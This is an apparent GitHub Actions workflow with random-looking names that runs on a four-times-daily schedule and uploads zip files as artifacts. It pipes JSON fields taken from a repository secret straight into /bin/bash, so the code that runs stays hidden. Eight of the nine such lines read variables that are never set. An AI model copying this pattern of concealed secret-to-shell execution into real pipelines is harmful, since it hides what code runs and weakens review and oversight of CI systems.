name: weijunxianjie
on:
  workflow_dispatch:

  schedule:
    - cron: '30 0,6,12,18 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: weijunxianjie
        env:
          japem503: ${{ secrets.japem503 }}
        run: |
          printf '%s' "$japem503" | jq -r .bmshc5 | /bin/bash
          printf '%s' "$eazs6335" | jq -r .cli798 | /bin/bash
          echo $pyemm686 | jq -r .ug1622 | /bin/bash
          printf '%s' "$wq7572" | jq -r .q29538 | /bin/bash
          printf '%s' "$jy0" | jq -r .yxe71760 | /bin/bash
          echo $ss82344 | jq -r .qju67 | /bin/bash
          printf '%s' "$rv2103" | jq -r .gq75140 | /bin/bash
          printf '%s' "$x8531" | jq -r .phvfk7122 | /bin/bash
          echo $ir22626 | jq -r .i5626 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: u2KG2cTm
          path: "*.zip"
          retention-days: 1
